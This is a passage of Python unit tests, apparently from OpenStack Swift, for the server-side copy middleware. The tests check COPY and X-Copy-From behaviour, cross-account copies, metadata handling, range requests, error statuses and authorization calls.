'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_basic_COPY(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') self.assertEqual(req.environ['swift.orig_req_method'], 'COPY') def test_basic_DLO(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is not sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertNotIn('x-object-manifest', self.app.headers[1]) self.assertNotIn('etag', self.app.headers[1]) def test_basic_DLO_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is sent'}, 'passed') 
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o?multipart-manifest=get', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy')) self.assertIn('x-object-manifest', self.app.headers[1]) self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path') self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') def test_COPY_source_metadata(self): source_headers = { 'x-object-sysmeta-test1': 'copy me', 'x-object-meta-test2': 'copy me too', 'x-object-transient-sysmeta-test3': 'ditto', 'x-object-sysmeta-container-update-override-etag': 'etag val', 'x-object-sysmeta-container-update-override-size': 'size val', 'x-object-sysmeta-container-update-override-foo': 'bar', 'x-delete-at': 'delete-at-time'} get_resp_headers = source_headers.copy() get_resp_headers['etag'] = 'source etag' self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers, body='passed') def verify_headers(expected_headers, unexpected_headers, actual_headers): for k, v in actual_headers: if k.lower() in expected_headers: expected_val = expected_headers.pop(k.lower()) self.assertEqual(expected_val, v) self.assertNotIn(k.lower(), unexpected_headers) self.assertFalse(expected_headers) self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy0'}) status, resp_headers, body = 
self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy0', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy0', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy1', 'Range': 'bytes=1-2'}) status, resp_headers, body = self.call_ssc(req) expected_headers = source_headers.copy() unexpected_headers = ( 'x-object-sysmeta-container-update-override-etag', 'x-object-sysmeta-container-update-override-size', 'x-object-sysmeta-container-update-override-foo') for h in unexpected_headers: expected_headers.pop(h) self.assertEqual('201 Created', status) verify_headers(expected_headers, unexpected_headers, resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy1', path) verify_headers( expected_headers, unexpected_headers, put_headers.items()) self.assertNotIn('etag', put_headers) req = Request.blank('/v1/a/c/o-copy1', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(expected_headers, unexpected_headers, resp_headers) self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o-copy2', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, 
put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy2', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy2', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') def test_COPY_no_destination_header(self): req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') self.assertEqual(len(self.authorized), 0) def test_basic_COPY_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o2', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o2', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) 
self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path) def test_COPY_across_containers(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c2/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o', self.authorized[1].path) def test_COPY_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = 
Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) 
self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) 
self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_bad_destination_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = 
Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'X-Object-Meta-Ours': 'okay', 
'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 
'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) with mock.patch('swift.common.middleware.copy.' 
'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_in_OPTIONS_response(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, 
path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertNotIn('swift.orig_req_method', req.environ) def test_COPY_in_OPTIONS_response_CORS(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT', 'Access-Control-Allow-Methods': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertTrue(('Access-Control-Allow-Methods', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def _test_COPY_source_headers(self, extra_put_headers): put_headers = {'Destination': '/c1/o', 'X-Object-Meta-Test2': 'added', 'X-Object-Sysmeta-Test2': 'added', 'X-Object-Transient-Sysmeta-Test2': 'added'} put_headers.update(extra_put_headers) get_resp_headers = { 'X-Timestamp': '1234567890.12345', 'X-Backend-Timestamp': '1234567890.12345', 'Content-Type': 'text/original', 'Content-Encoding': 'gzip', 'Content-Disposition': 'attachment; filename=myfile', 'X-Object-Meta-Test': 'original', 'X-Object-Sysmeta-Test': 'original', 'X-Object-Transient-Sysmeta-Test': 'original', 'X-Foo': 'Bar'} self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers) self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 
Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('added', req_headers.get('X-Object-Meta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Transient-Sysmeta-Test2')) return req_headers def test_COPY_source_headers_no_updates(self): req_headers = self._test_COPY_source_headers({}) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=myfile', req_headers.get('Content-Disposition')) self.assertEqual('original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_source_headers_with_updates(self): put_headers = { 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) 
self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_x_fresh_metadata_no_updates(self): put_headers = { 'X-Fresh-Metadata': 'true', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertIn('X-Fresh-Metadata', req_headers) self.assertNotIn('X-Object-Meta-Test', req_headers) self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) self.assertNotIn('Content-Encoding', req_headers) self.assertNotIn('Content-Disposition', req_headers) self.assertNotIn('X-Foo', req_headers) def test_COPY_x_fresh_metadata_with_updates(self): put_headers = { 'X-Fresh-Metadata': 'true', 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) def test_COPY_with_single_range(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'etag': 'bogus etag'}, 
"abcdefghijklmnop") self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c1/o', path) self.assertNotIn('etag', (h.lower() for h in req_headers)) self.assertEqual('6', req_headers['content-length']) req = swob.Request.blank('/v1/a/c1/o', method='GET') status, headers, body = self.call_ssc(req) self.assertEqual('fghijk', body) @patch_policies(with_ec_default=True) class TestServerSideCopyMiddlewareWithEC(unittest.TestCase): container_info = { 'status': 200, 'write_acl': None, 'read_acl': None, 'storage_policy': None, 'sync_key': None, 'versions': None, } def setUp(self): self.logger = debug_logger('proxy-server') self.logger.thread_locals = ('txn1', '127.0.0.2') self.app = PatchedObjControllerApp( None, FakeMemcache(), account_ring=FakeRing(), container_ring=FakeRing(), logger=self.logger) self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger self.policy = POLICIES.default self.app.container_info = dict(self.container_info) def test_COPY_with_single_range(self): req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) segment_size = self.policy.ec_segment_size real_body = ('asdf' * segment_size)[:-10] chunks = [real_body[x:x + segment_size] for x in range(0, len(real_body), segment_size)] fragments = self.policy.pyeclib_driver.encode(chunks[0]) fragment_payloads = [] fragment_payloads.append(fragments) node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))} responses = [(200, ''.join(node_fragments[i]), 
